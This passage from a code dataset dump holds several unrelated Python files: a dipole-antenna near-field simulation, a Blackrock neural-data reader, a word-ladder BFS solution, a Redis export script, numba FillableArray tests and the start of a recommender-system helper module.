F(s,rmx,rnx,wk,sx1,rmy,rny,sy1,rmz,rnz,sz1,rad):\r\n# return(np.exp(-1j*wk*np.sqrt((rmx-rnx - s*sx1)**2 + (rmy - rny - s*sy1)**2 + (rmz - rnz - s*sz1)**2 + rad**2))/np.sqrt((rmx - rnx - s*sx1)**2 + (rmy - rny - s*sy1)**2 + (rmz - rnz - s*sz1)**2 + rad**2))\r\n# \r\n# psi = integrate.quad(F, 0, delta,(rmx,rnx,wk,sx1,rmy,rny,sy1,rmz,rnz,sz1,rad))\r\n def Fi(s,rmx,rnx,wk,sx1,rmy,rny,sy1,rmz,rnz,sz1,rad):\r\n return (np.imag(np.exp(-1j*wk*np.sqrt((rmx-rnx-s*sx1)**2+(rmy-rny-s*sy1)**2+(rmz-rnz-s*sz1)**2+rad**2))/np.sqrt((rmx-rnx-s*sx1)**2+(rmy-rny-s*sy1)**2+(rmz-rnz-s*sz1)**2+rad**2)))\r\n def Fr(s,rmx,rnx,wk,sx1,rmy,rny,sy1,rmz,rnz,sz1,rad):\r\n return (np.real(np.exp(-1j*wk*np.sqrt((rmx-rnx-s*sx1)**2+(rmy-rny-s*sy1)**2+(rmz-rnz-s*sz1)**2+rad**2))/np.sqrt((rmx-rnx-s*sx1)**2+(rmy-rny-s*sy1)**2+(rmz-rnz-s*sz1)**2+rad**2)))\r\n \r\n psir = integrate.quad(Fr, 0.0, delta,(rmx,rnx,wk,sx1,rmy,rny,sy1,rmz,rnz,sz1,rad))\r\n psii = integrate.quad(Fi, 0.0, delta,(rmx,rnx,wk,sx1,rmy,rny,sy1,rmz,rnz,sz1,rad))\r\n psi=psir[0]+1j*psii[0]\r\n \r\n else:\r\n# def F(s,rmx,rnx,wk,sx1,rmy,rny,sy1,rmz,rnz,sz1,rad):\r\n# return(np.exp(-1j*wk*np.sqrt((rmx-rnx - s*sx1)**2 + (rmy - rny - s*sy1)**2 + (rmz - rnz - s*sz1)**2 + rad**2))/np.sqrt((rmx - rnx - s*sx1)**2 + (rmy - rny - s*sy1)**2 + (rmz - rnz - s*sz1)**2 + rad**2))\r\n# \r\n# psi = integrate.quad(F, 0, delta,(rmx,rnx,wk,sx1,rmy,rny,sy1,rmz,rnz,sz1,rad))\r\n def Fi(s,rmx,rnx,wk,sx1,rmy,rny,sy1,rmz,rnz,sz1,rad):\r\n return (np.imag(np.exp(-1j*wk*np.sqrt((rmx-rnx-s*sx1)**2+(rmy-rny-s*sy1)**2+(rmz-rnz-s*sz1)**2+rad**2))/np.sqrt((rmx-rnx-s*sx1)**2+(rmy-rny-s*sy1)**2+(rmz-rnz-s*sz1)**2+rad**2)))\r\n def Fr(s,rmx,rnx,wk,sx1,rmy,rny,sy1,rmz,rnz,sz1,rad):\r\n return (np.real(np.exp(-1j*wk*np.sqrt((rmx-rnx-s*sx1)**2+(rmy-rny-s*sy1)**2+(rmz-rnz-s*sz1)**2+rad**2))/np.sqrt((rmx-rnx-s*sx1)**2+(rmy-rny-s*sy1)**2+(rmz-rnz-s*sz1)**2+rad**2)))\r\n \r\n psir = integrate.quad(Fr, 0.0, 
delta,(rmx,rnx,wk,sx1,rmy,rny,sy1,rmz,rnz,sz1,rad))\r\n psii = integrate.quad(Fi, 0.0, delta,(rmx,rnx,wk,sx1,rmy,rny,sy1,rmz,rnz,sz1,rad))\r\n psi=psir[0]+1j*psii[0]\r\n\r\n return(psi)\r\n \r\n# =============================================================================\r\n# ==========================## VECPOT ##=======================================\r\n\r\ndef vecpot(rx, ry, rz, wk, rad, m, n, del1):\r\n \r\n rmx = rx[m]\r\n rmy = ry[m]\r\n rmz = rz[m]\r\n \r\n if (del1 == 0.5): \r\n rnx = rx[n]\r\n rny = ry[n]\r\n rnz = rz[n]\r\n (sx1, sy1, sz1, rmag) = sunit(rx, ry, rz, n)\r\n \r\n elif (del1 == -0.5):\r\n (rnx, rny, rnz) = rmhvector(rx,ry,rz,n-1)\r\n (sx1, sy1, sz1, rmag) = sunit(rx, ry, rz, n-1)\r\n \r\n delta2 = rmag/2.0\r\n \r\n if (m==n):\r\n def Fi(s,rmx,rnx,wk,sx1,rmy,rny,sy1,rmz,rnz,sz1,rad):\r\n return (np.imag(np.exp(-1j*wk*np.sqrt((rmx-rnx-s*sx1)**2+(rmy-rny-s*sy1)**2+(rmz-rnz-s*sz1)**2+rad**2))/np.sqrt((rmx-rnx-s*sx1)**2+(rmy-rny-s*sy1)**2+(rmz-rnz-s*sz1)**2+rad**2)))\r\n def Fr(s,rmx,rnx,wk,sx1,rmy,rny,sy1,rmz,rnz,sz1,rad):\r\n return (np.real(np.exp(-1j*wk*np.sqrt((rmx-rnx-s*sx1)**2+(rmy-rny-s*sy1)**2+(rmz-rnz-s*sz1)**2+rad**2))/np.sqrt((rmx-rnx-s*sx1)**2+(rmy-rny-s*sy1)**2+(rmz-rnz-s*sz1)**2+rad**2)))\r\n \r\n psir = integrate.quad(Fr, 0.0, delta2,(rmx,rnx,wk,sx1,rmy,rny,sy1,rmz,rnz,sz1,rad))\r\n psii = integrate.quad(Fi, 0.0, delta2,(rmx,rnx,wk,sx1,rmy,rny,sy1,rmz,rnz,sz1,rad))\r\n psi=psir[0]+1j*psii[0]\r\n \r\n elif (m!=n):\r\n def Fi(s,rmx,rnx,wk,sx1,rmy,rny,sy1,rmz,rnz,sz1,rad):\r\n return(np.imag(np.exp(-1j*wk*np.sqrt((rmx-rnx-s*sx1)**2+(rmy-rny-s*sy1)**2+(rmz-rnz-s*sz1)**2+rad**2))/np.sqrt((rmx-rnx-s*sx1)**2+(rmy-rny-s*sy1)**2+(rmz-rnz-s*sz1)**2+rad**2)))\r\n def Fr(s,rmx,rnx,wk,sx1,rmy,rny,sy1,rmz,rnz,sz1,rad):\r\n return(np.real(np.exp(-1j*wk*np.sqrt((rmx-rnx-s*sx1)**2+(rmy-rny-s*sy1)**2+(rmz-rnz-s*sz1)**2+rad**2))/np.sqrt((rmx-rnx-s*sx1)**2+(rmy-rny-s*sy1)**2+(rmz-rnz-s*sz1)**2+rad**2)))\r\n psir = integrate.quad(Fr, 0.0, delta2,(rmx,rnx,wk,sx1,rmy,rny,sy1,rmz,rnz,sz1,rad))\r\n psii = integrate.quad(Fi, 0.0, delta2,(rmx,rnx,wk,sx1,rmy,rny,sy1,rmz,rnz,sz1,rad))\r\n psi=psir[0]+1j*psii[0]\r\n \r\n return(psi)\r\n\r\n# =========================### EFIELD ###======================================\r\ndef efieldnear(rx, ry, rz, xdd, ydd, zdd, solvector, wk, rad, factor, delta, wavelength, ix, iy, iz, nunkns):\r\n# rx = np.arange(nunkns2,dtype=np.float)\r\n \r\n nunkns2 = nunkns+2 \r\n mp1 = nunkns2 +1\r\n rxx= np.arange(mp1+3,dtype=np.float)\r\n ryy= np.arange(mp1+3,dtype=np.float)\r\n rzz= np.arange(mp1+3,dtype=np.float)\r\n for o in range (0,33):\r\n rxx[o]=rx[o]\r\n ryy[o]=ry[o]\r\n rzz[o]=rz[o]\r\n if (ix == 1):\r\n \r\n rxx[mp1] = xdd - 0.0005*wavelength\r\n ryy[mp1] = ydd\r\n rzz[mp1] = zdd\r\n \r\n rxx[mp1+1] = xdd \r\n ryy[mp1+1] = ydd\r\n rzz[mp1+1] = zdd\r\n \r\n rxx[mp1+2] = xdd + 0.0005*wavelength\r\n ryy[mp1+2] = ydd\r\n rzz[mp1+2] = zdd\r\n \r\n elif (iy == 1):\r\n \r\n rxx[mp1] = xdd \r\n ryy[mp1] = ydd - 0.0005*wavelength\r\n rzz[mp1] = zdd\r\n \r\n rxx[mp1+1] = xdd \r\n ryy[mp1+1] = ydd\r\n rzz[mp1+1] = zdd\r\n \r\n rxx[mp1+2] = xdd \r\n ryy[mp1+2] = ydd + 0.0005*wavelength\r\n rzz[mp1+2] = zdd\r\n \r\n else:\r\n \r\n rxx[mp1] = xdd \r\n ryy[mp1] = ydd \r\n rzz[mp1] = zdd - 0.0005*wavelength\r\n \r\n rxx[mp1+1] = xdd \r\n ryy[mp1+1] = ydd\r\n rzz[mp1+1] = zdd\r\n \r\n rxx[mp1+2] = xdd \r\n ryy[mp1+2] = ydd \r\n rzz[mp1+2] = zdd + 0.0005*wavelength\r\n \r\n \r\n (rx1, ry1, rz1) = rmhvector(rxx,ryy,rzz,mp1+1)\r\n (rx2, ry2, rz2) = 
rmhvector(rxx,ryy,rzz,mp1)\r\n \r\n diffx = rx1 - rx2\r\n diffy = ry1 - ry2\r\n diffz = rz1 - rz2\r\n \r\n esum = 0.0\r\n \r\n for n in range(0,nunkns):\r\n np1 = n + 1\r\n \r\n psi1 = vecpot(rxx, ryy, rzz, wk, rad, mp1+1, np1, 0.5)\r\n psi2 = vecpot(rxx, ryy, rzz, wk, rad, mp1+1, np1, -0.5)\r\n \r\n psi3 = scalarpot(rxx, ryy, rzz, wk, rad, mp1+1, +0.5, np1, np1+1)\r\n psi4 = scalarpot(rxx, ryy, rzz, wk, rad, mp1+1, +0.5, np1-1, np1)\r\n psi5 = scalarpot(rxx, ryy, rzz, wk, rad, mp1+1, -0.5, np1, np1+1)\r\n psi6 = scalarpot(rxx, ryy, rzz, wk, rad, mp1+1, -0.5, np1-1, np1)\r\n \r\n \r\n # s unit vectors\r\n (sx1, sy1, sz1, rmag) = sunit(rx, ry, rz, np1)\r\n (sx2, sy2, sz2, rmag) = sunit(rx, ry, rz, n)\r\n \r\n #dotties \r\n dot1 = psi1*(diffx*sx1+diffy*sy1+diffz*sz1)\r\n dot2 = psi2*(diffx*sx2+diffy*sy2+diffz*sz2)\r\n dotprod = (wk**2)*(dot1 + dot2)\r\n \r\n matrix = factor*(dotprod - psi3/delta + psi4/delta + psi5/delta - psi6/delta)\r\n esum = esum + matrix*solvector[n] #change vector operation\r\n \r\n return( -esum/0.001/np.sqrt(2)) #x components of electric field\r\n \r\n\r\n\r\n\r\n\r\n# z-comp of Electric Field (Near Field Calculation for a Wire\r\n#Antenna) for near field calculation August, 2007\r\n\r\n#******************** INPUT ******************************* % Variables with asterik (*) on the comment on the right side are INPUT\r\nnunkns = gnunkns \r\nfeedVoltage = FV # ******** Number of Unknowns (for current) on the Antenna\r\nnunkns2 = nunkns + 2\r\nfreq = Freq # ******************* Frequency (Hz)\r\nvel = 3 * 10 ** 8 # velocity of light in free space\r\nomega = 2 * np.pi * freq # angular frequency (rad/sec)\r\nwk = omega / vel # propagation constant (2*pi/lambda)\r\nwavelength = vel / freq # wavelength (m)\r\nlength = Len * wavelength # ****************** Half dipole length (in lambda)\r\ndlength = 2 * length\r\nrad = Rad * wavelength # ******************** Radius of Dipole (in lambda)\r\nwaveimp = WI # ********** Wave Impedance in free space(ohms)\r\neps = 1 / (36 * np.pi * 10 ** 9 ) # ********** Free space permittivity (F/m)\r\nzg = ZG # ********* Feed point of the antenna (zg=0 for Center-fed)\r\ndelta = 2 * length / (nunkns + 1 ) # Antenna segment length (2*L/(N+1))\r\n\r\n\r\n# Grid points (x,y,z) where near field needs to be computed\r\ndx = 0\r\ndy = 0\r\ndz = 0.001\r\nndx = 1\r\nndy = 1\r\nndz = 300\r\nxstart = 0.0 * wavelength\r\n\r\nystart_array = np.array([0.01, 0.03, 0.05])\r\nzstart = 0.001 * wavelength\r\n\r\n\r\n# ****** For Antenna case, the Dipole is Center-fed with 1 Volt ******\r\n# Forcing Function \"vmvector\" is Unity at feedpoint\r\nvmvector= np.arange(nunkns,dtype=np.float).reshape(nunkns,1)\r\n\r\nfor i in range(1,nunkns):\r\n matchpnt = ((nunkns - 1) / 2) + 0\r\n \r\n if (i == matchpnt):\r\n \r\n vmvector[i] = feedVoltage # ******* Antenna feed voltage(change the value inside the brackets)\r\n else:\r\n vmvector[i] = 0\r\n \r\n\r\n\r\n# ************************** End of Input Data********************\r\n# The array rx,ry,rz gives the x,y,z components of wire segment end points\r\n \r\nrx = np.arange(nunkns2,dtype=np.float)\r\nry = np.arange(nunkns2,dtype=np.float)\r\nrz = np.arange(nunkns2,dtype=np.float)\r\n\r\nfor n in range(0, nunkns2):\r\n rx[n] = 0.0\r\n ry[n] = 0.0\r\n rz[n] = -(length) + delta*(n-0)\r\n \r\n \r\n \r\n# Calculation of the Impedance Matrix \"zmatrix\"\r\n#factor = np.dtype(np.complex128)\r\n \r\nfactor = -1 / (1j * 4 * np.pi * omega * eps)\r\nzmatrix = np.zeros(shape=(nunkns,nunkns),dtype=np.complex)\r\nfor m in 
range(0,nunkns):\r\n mp1 = m + 1\r\n (rx1,ry1,rz1) = rmhvector(rx,ry,rz,mp1)\r\n (rx2,ry2,rz2) = rmhvector(rx,ry,rz,m)\r\n \r\n diffx = rx1 - rx2\r\n diffy = ry1 - ry2\r\n diffz = rz1 - rz2\r\n \r\n for l in range(0,nunkns):\r\n np1 = l + 1\r\n \r\n\r\n # Contribution due to vector potential\r\n#\r\n\r\n psi1 = vecpot(rx, ry, rz, wk, rad, mp1, np1, 0.5)\r\n psi2 = vecpot(rx, ry, rz, wk, rad, mp1, np1, -0.5)\r\n\r\n #Contribution due to scalar potential\r\n\r\n psi3 = scalarpot(rx, ry, rz, wk, rad, mp1, 0.5, np1, np1 + 1)\r\n psi4 = scalarpot(rx, ry, rz, wk, rad, mp1, 0.5, np1 - 1, np1)\r\n psi5 = scalarpot(rx, ry, rz, wk, rad, mp1, -0.5, np1, np1 + 1)\r\n psi6 = scalarpot(rx, ry, rz, wk, rad, mp1, -0.5, np1 - 1, np1)\r\n\r\n # S unit vectors\r\n (sx1, sy1, sz1, rmag) = sunit(rx, ry, rz, np1)\r\n (sx2, sy2, sz2, rmag) = sunit(rx, ry, rz, l)\r\n\r\n# # Dot products\r\n dot1 = psi1 * (diffx * sx1 + diffy * sy1 + diffz * sz1)\r\n dot2 = psi2 * (diffx * sx2 + diffy * sy2 + diffz * sz2)\r\n dotprod = wk ** 2 * (dot1 + dot2)\r\n#\r\n ytt=factor * (dotprod - psi3 / delta + psi4 / delta + psi5 / delta - psi6 / delta)\r\n zmatrix[m][l] = factor * (dotprod - psi3 / delta + psi4 / delta + psi5 / delta - psi6 / delta)\r\n#\r\n# \r\n\r\n#\r\n## SOLUTION BY MATRIX INVERSION\r\n#\r\nsolstep = inv(zmatrix) * vmvector # solvector is the solution vector\r\nsolvector=solstep[15]\r\n##with current on the antenna\r\n## Plot the Current Distribution on the Wire Antenna\r\n#\r\nrsolvec = np.real(solvector)\r\nisolvec = np.imag(solvector)\r\nrrealpart = np.arange(nunkns,dtype=np.float)\r\nrealpart = np.arange(nunkns2,dtype=np.float)\r\nimagpart = np.arange(nunkns2,dtype=np.float)\r\niimagpart = np.arange(nunkns,dtype=np.float)\r\nzpart = np.arange(nunkns,dtype=np.float)\r\nfor ip in range (0,nunkns):\r\n rrealpart[ip] = rsolvec[ip]\r\n iimagpart[ip] = isolvec[ip]\r\n zpart[ip] = rz[ip]\r\n#end\r\n#\r\nfor ipp in range(0,nunkns2-1):\r\n if ipp == 0:\r\n realpart[ipp] = 0\r\n imagpart[ipp] = 0\r\n elif ipp == nunkns2:\r\n realpart[ipp] = 0\r\n imagpart[ipp] = 0\r\n else:\r\n realpart[ipp] = rrealpart[ipp - 1]\r\n imagpart[ipp] = iimagpart[ipp - 1]\r\nrealpart[nunkns2-1] = 0\r\nimagpart[nunkns2-1] = 0 \r\n\r\n#\r\n#\r\n## Near Field Computations\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nmp1 = nunkns2 + 1\r\nnearfield = np.zeros(shape=(3,ndz),dtype=np.float)\r\nxd = np.arange(ndx,dtype=np.float)\r\nyd = np.arange(ndy,dtype=np.float)\r\nzd = np.arange(ndz,dtype=np.float)\r\nfor kk in range(0,3):\r\n nfield_points = 0\r\n ystart = ystart_array[kk]\r\n for i in range(0,ndx):\r\n xd[i] = xstart + (i - 1) * dx\r\n xdi = xd[i]\r\n for j in range(0,ndy):\r\n yd[j]= ystart + (j - 1) * dy\r\n ydj = yd[j]\r\n for k in range(0,ndz):\r\n nfield_points = nfield_points + 1\r\n zd[k] = zstart + (k - 0) * dz\r\n zdk = zd[k]\r\n # efieldx,efieldy and efieldz are the x,y,z components of the\r\n #Electric Field\r\n\r\n # **** NOTE ***** In this example only the z-comp of E-field is\r\n #being \r\n # therefore, efieldx and efieldy are commented out\r\n\r\n #efieldx=efieldnear(rx,ry,rz,xdi,ydj,zdk,solvector,wk,rad,factor,delta,\r\n #wavelength,1,0,0,nunkns);\r\n\r\n #efieldy=efieldnear(rx,ry,rz,xdi,ydj,zdk,solvector,wk,rad,factor,delta,\r\n #wavelength,0,1,0,nunkns);\r\n\r\n efieldz = efieldnear(rx, ry, rz, xdi, ydj, zdk, solvector, wk, rad, factor, delta, wavelength, 0, 0, 1, nunkns)\r\n\r\n # nearfield(kk,nfield_points)=abs(efieldx); % if x-comp of near\r\n #field is needed\r\n # nearfield(kk,nfield_points)=abs(efieldy); % 
if y-comp of near field is needed\r\n                nearfield[kk][nfield_points-1] = abs(efieldz)  # z-comp of near field\r\n#    end  # loop over k (z values)\r\n#    end  # loop for j (y values)\r\n#    end  # loop over i (x values)\r\n#end  # loop over kk\r\n#\r\n# String copy of the field table for printing; moved out of the inner loop,\r\n# where it was needlessly recomputed for every single field point\r\nnewnearfield = nearfield.astype(str)\r\n#\r\n#If the following three lines are commented out the Antenna Current is\r\n#not plotted\r\nplt.plot(rz,realpart,'k-',rz,imagpart,'o')\r\nplt.grid()\r\nplt.title('Current Distribution over a lambda/2 dipole @ %f GHz' %(Freq1))\r\nplt.xlabel('Length (m)')\r\nplt.ylabel('Current Distribution (A)')\r\n\r\n#\r\n#\r\n## Plot of Electric Field vs z/lambda for three values of rho/lambda\r\n#\r\nzd_over_lambda = zd/wavelength    # dimensionless axis: z divided by the wavelength\r\n\r\nplt.figure(0)\r\nplt.grid()\r\nplt.plot(zd_over_lambda, nearfield[0],'k-')\r\nplt.plot(zd_over_lambda, nearfield[1],'b-')\r\nplt.plot(zd_over_lambda, nearfield[2],'r-')\r\nplt.title('Z-component of Electric Field for lambda/2 dipole at: %f GHz' %(Freq1))\r\nplt.xlabel('Z/lambda')\r\nplt.ylabel('Electric Field in (V/m)')\r\n\r\nprint(zd)\r\nprint(\"Near-field |Ez| samples:\")\r\nprint(newnearfield)\r\n#plt.plot(zd(mslice[:]), nearfield(2, mslice[:]), mstring('b-'))\r\n#hold(mstring('on'))\r\n#grid(mstring('on'))\r\n\r\n#\r\n#plot(zd(mslice[:]), nearfield(3, mslice[:]), mstring('r-'))\r\n\r\n#xlabel(mstring('Z/lambda'))\r\n#ylabel(mstring('Electric Field in (V/m)'))\r\n#gtext(mstring('y (lambda) =0.01'))\r\n#gtext(mstring('0.03'))\r\n#gtext(mstring('0.05'))\r\n#hold(mstring('off'))\r\n","sub_path":"NearFieldCo/NearFieldCodeV3.2.py","file_name":"NearFieldCodeV3.2.py","file_ext":"py","file_size_in_byte":23666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"295461861","text":"# -*- coding: utf-8 -*-\n\nfrom neo.io.basefromrawio import BaseFromRaw\nfrom neo.rawio.blackrockrawio import BlackrockRawIO\n\n\ndef _move_channel_indexes_and_analogsignals(from_block, to_block):\n    if len(from_block.segments) != len(to_block.segments):\n        raise ValueError('Can not assign segments between block 1 and 2. 
Different number of '\n 'segments present.')\n\n for seg_id in range(len(from_block.segments)):\n for ana in from_block.segments[seg_id].analogsignals:\n # redirect links from data object to container objects\n ana.segment = to_block.segments[seg_id]\n ana.channel_index.block = to_block\n\n # add links from container objects to analogsignal\n ana.segment.analogsignals.append(ana)\n # channel index was already relinked for another segment\n if ana.channel_index not in to_block.channel_indexes:\n to_block.channel_indexes.append(ana.channel_index)\n\n # remove (now) duplicated units from channel_index, remove irregular signals\n ana.channel_index.units = []\n ana.channel_index.irregularlysampledsignals = []\n\n\nclass BlackrockIO_single_nsx(BlackrockRawIO, BaseFromRaw):\n \"\"\"\n Supplementary class for reading BlackRock data using only a single nsx file.\n \"\"\"\n name = 'Blackrock IO for single nsx'\n description = \"This IO reads a pair of corresponding nev and nsX files of the Blackrock \" \\\n \"\" + \"(Cerebus) recording system.\"\n\n _prefered_signal_group_mode = 'split-all'\n\n def __init__(self, filename, nsx_to_load=None, **kargs):\n BlackrockRawIO.__init__(self, filename=filename, nsx_to_load=nsx_to_load, **kargs)\n BaseFromRaw.__init__(self, filename)\n\n\nclass BlackrockIO(BlackrockIO_single_nsx):\n name = 'Blackrock IO'\n description = \"This IO reads .nev/.nsX files of the Blackrock (Cerebus) recording system.\"\n\n def __init__(self, filename, nsx_to_load='all', **kargs):\n BlackrockIO_single_nsx.__init__(self, filename)\n if nsx_to_load == 'all':\n self._selected_nsx = self._avail_nsx\n else:\n self._selected_nsx = [nsx_to_load]\n self._nsx_ios = []\n for nsx in self._selected_nsx:\n self._nsx_ios.append(BlackrockIO_single_nsx(filename, nsx_to_load=nsx, **kargs))\n\n def read_block(self, **kargs):\n bl = self._nsx_ios[0].read_block(**kargs)\n for nsx_ios in self._nsx_ios[1:]:\n nsx_block = nsx_ios.read_block(**kargs)\n _move_channel_indexes_and_analogsignals(nsx_block, bl)\n del nsx_block\n return bl\n\n def read_segment(self, **kargs):\n seg = self._nsx_ios[0].read_segment(**kargs)\n for nsx_ios in self._nsx_ios[1:]:\n nsx_seg = nsx_ios.read_segment(**kargs)\n seg.analogsignals.extend(nsx_seg.analogsignals)\n for ana in nsx_seg.analogsignals:\n ana.segment = seg\n ana.channel_index = None\n del nsx_seg\n return seg\n","sub_path":"neo/io/blackrockio.py","file_name":"blackrockio.py","file_ext":"py","file_size_in_byte":3059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"269043056","text":"#http://www.cnblogs.com/yrbbest/p/4438488.html\n#bi-bfs\n\n\"\"\"\nGiven two words (beginWord and endWord), and a dictionary's word list, find the length of shortest transformation sequence from beginWord to endWord, such that:\n\nOnly one letter can be changed at a time\nEach intermediate word must exist in the word list\nFor example,\n\nGiven:\nbeginWord = \"hit\"\nendWord = \"cog\"\nwordList = [\"hot\",\"dot\",\"dog\",\"lot\",\"log\"]\nAs one shortest transformation is \"hit\" -> \"hot\" -> \"dot\" -> \"dog\" -> \"cog\",\nreturn its length 5.\n\nNote:\nReturn 0 if there is no such transformation sequence.\nAll words have the same length.\nAll words contain only lowercase alphabetic characters.\n\"\"\"\n\nclass Solution(object):\n def ladderLength(self, beginWord, endWord, wordList):\n \"\"\"\n :type beginWord: str\n :type endWord: str\n :type wordList: Set[str]\n :rtype: int\n \"\"\"\n #return self.bfs(beginWord, endWord, 
wordList)\n return self.bi_bfs(beginWord, endWord, wordList)\n \n def bfs(self, beginWord, endWord, wordList):\n q=[]\n #isIn={}\n #isIn[beginWord]=True\n q.append( (beginWord, 1) )\n while q:\n (word, level) = q.pop(0)\n for i in range(len(word)):\n for c in \"abcdefghijklmnopqrstuvwxyz\":\n if word[i]!=c:\n new_word = word[:i] + c + word[i+1:]\n #if new_word not in isIn and new_word in wordList:\n if new_word in wordList:\n if new_word == endWord:\n return level+1\n q.append( (new_word, level+1) )\n #isIn[new_word]=True\n wordList.remove(new_word)\n \n return 0\n \n def bi_bfs(self, beginWord, endWord, wordList):\n begin_set =set()\n end_set = set()\n wordset = set(wordList)\n \n begin_set.add( (beginWord) )\n end_set.add( (endWord) )\n step = 2\n while len(begin_set)>0 and len(end_set)>0:\n if len(begin_set) > len(end_set):\n tmp = end_set\n end_set = begin_set\n begin_set = tmp\n tmp = set()\n for word in begin_set:\n for i in range(len(word)):\n for c in \"abcdefghijklmnopqrstuvwxyz\":\n if word[i]!=c:\n new_word = word[:i] + c + word[i+1:]\n if new_word in end_set:\n return step\n if new_word in wordset:\n tmp.add(new_word)\n wordset.remove(new_word)\n begin_set = tmp \n step +=1 \n \n return 0\n","sub_path":"127_Word_Ladder.py","file_name":"127_Word_Ladder.py","file_ext":"py","file_size_in_byte":2845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"81471325","text":"import redis,json\n\ndef connect_redis():\n\tpool = redis.ConnectionPool(host='127.0.0.1', port=6379, db=0, password=None,\n\t\t\t\t\t\t\t\tencoding='utf-8', decode_responses=True)\n\tredisdb = redis.Redis(connection_pool=pool)\n\tprint('链接Redis:{0} 成功'.format(redisdb))\n\treturn redisdb\n\ndef read_info():\n\tfor i in redisdb.sscan_iter(articlesIDKey):\n\t\ti = json.loads(i)\n\t\tarID = i['ID']\n\t\tprint(arID)\n\ndef save_info(redisdb,filen):\n\twith open(filen,'w') as f:\n\t\tfor i in redisdb.sscan_iter(articlesIDKey):\n\t\t\tline = '{0}\\n'.format(json.dumps(json.loads(i),ensure_ascii=False))\n\t\t\tf.write(line)\n\t\t\n\t\tprint('保存完成')\n\nif __name__ == '__main__':\n\tfilen = r'/media/gumoha/资料/Scrapy/QDaily/ArticlesData/-ArticlesSketch-.json'\n\tarticlesIDKey = 'Qdaily_articlesID'\n\tredisdb = connect_redis()\n\t\n\tsave_info(redisdb,filen)\n\t\n\t\t\n\t\n\t\n","sub_path":"Redis_ReadArticlesIDInfo.py","file_name":"Redis_ReadArticlesIDInfo.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"446606405","text":"# BSD 3-Clause License; see https://github.com/jpivarski/awkward-1.0/blob/master/LICENSE\n\nimport sys\nimport os\nimport json\n\nimport pytest\nimport numpy\n\nimport awkward1\n\nnumba = pytest.importorskip(\"numba\")\n\ndef test_boxing():\n @numba.njit\n def f1(q):\n z = q\n return 3.14\n\n a = awkward1.layout.FillableArray()\n assert sys.getrefcount(a) == 2\n f1(a)\n assert sys.getrefcount(a) == 2\n\n @numba.njit\n def f2(q):\n z = q\n return q\n\n a = awkward1.layout.FillableArray()\n assert sys.getrefcount(a) == 2\n f2(a)\n assert sys.getrefcount(a) == 2\n b = f2(a)\n assert sys.getrefcount(a) == 3\n\n assert str(b.snapshot()) == \"\"\"\"\"\"\n\ndef test_simple():\n @numba.njit\n def f1(q):\n q.clear()\n return 3.14\n\n a = awkward1.layout.FillableArray()\n f1(a)\n\ndef test_boolean():\n @numba.njit\n def f1(q):\n q.boolean(True)\n q.boolean(False)\n q.boolean(False)\n return q\n\n a = awkward1.layout.FillableArray()\n b = f1(a)\n assert 
awkward1.tolist(a.snapshot()) == [True, False, False]\n assert awkward1.tolist(b.snapshot()) == [True, False, False]\n\ndef test_integer():\n @numba.njit\n def f1(q):\n q.integer(1)\n q.integer(2)\n q.integer(3)\n return q\n\n a = awkward1.layout.FillableArray()\n b = f1(a)\n assert awkward1.tolist(a.snapshot()) == [1, 2, 3]\n assert awkward1.tolist(b.snapshot()) == [1, 2, 3]\n\ndef test_real():\n @numba.njit\n def f1(q, z):\n q.real(1)\n q.real(2.2)\n q.real(z)\n return q\n\n a = awkward1.layout.FillableArray()\n b = f1(a, numpy.array([3.5], dtype=numpy.float32)[0])\n assert awkward1.tolist(a.snapshot()) == [1, 2.2, 3.5]\n assert awkward1.tolist(b.snapshot()) == [1, 2.2, 3.5]\n\ndef test_list():\n @numba.njit\n def f1(q):\n q.beginlist()\n q.real(1.1)\n q.real(2.2)\n q.real(3.3)\n q.endlist()\n q.beginlist()\n q.endlist()\n q.beginlist()\n q.real(4.4)\n q.real(5.5)\n q.endlist()\n return q\n\n a = awkward1.layout.FillableArray()\n b = f1(a)\n assert awkward1.tolist(a.snapshot()) == [[1.1, 2.2, 3.3], [], [4.4, 5.5]]\n assert awkward1.tolist(b.snapshot()) == [[1.1, 2.2, 3.3], [], [4.4, 5.5]]\n\n @numba.njit\n def f2(q):\n return len(q)\n\n assert f2(a) == 3\n assert f2(b) == 3\n\n @numba.njit\n def f3(q):\n q.clear()\n return q\n\n c = f3(b)\n assert awkward1.tolist(a.snapshot()) == []\n assert awkward1.tolist(b.snapshot()) == []\n assert awkward1.tolist(c.snapshot()) == []\n","sub_path":"tests/test_PR022_fillablearray_in_numba.py","file_name":"test_PR022_fillablearray_in_numba.py","file_ext":"py","file_size_in_byte":2626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"600436101","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom numpy import genfromtxt, savetxt\n\nimport os\nimport numpy as np\nimport gzip, pickle\n\nimport theano\nimport theano.tensor as T\n\n# Cost Functions\ndef meanSquaredError(x_predicted, x):\n return T.sum((x_predicted - x) ** 2, axis=1)\n \ndef crossEntropyCost(x_predicted, x):\n return -T.sum(x * T.log(x_predicted) + (1 - x) * T.log(1 - x_predicted), axis=1)\n\n# Activation Functions\ndef impTanh(x):\n beta = 2.0/3.0\n alfa = 2.5\n return alfa * T.tanh(beta * x)\n\n# Format path for results\ndef makePath(type_experiment, lvet, sl_technique, user_hlayers_sizes, item_hlayers_sizes, training_epochs, corruption_levels, n_factors,\n normalization_method, matrix_normalization, preprocess_svd, sparsity_weight, learning_rate, activation, dropout, early_stopping):\n \n dpout = 'NoDropout'\n sparse = 'NoSparse'\n earlystop = 'NoEarlyStop'\n if sparsity_weight > 0:\n sparse = 'Sparse'\n if dropout == True:\n dpout = 'Dropout'\n if early_stopping == True:\n earlystop = 'EarlyStop'\n \n if lvet == 'autoencoder' and preprocess_svd:\n return '%s%f-%s-SVD-%d-%s/%s-%s-%s-u%s-i%s-%s-%diterations-%s-%s-lr%f' % (sparse, sparsity_weight, dpout, activation, n_factors, type_experiment, lvet, sl_technique, '-'.join(str(n) for n in user_hlayers_sizes), '-'.join(str(n) for n in item_hlayers_sizes), 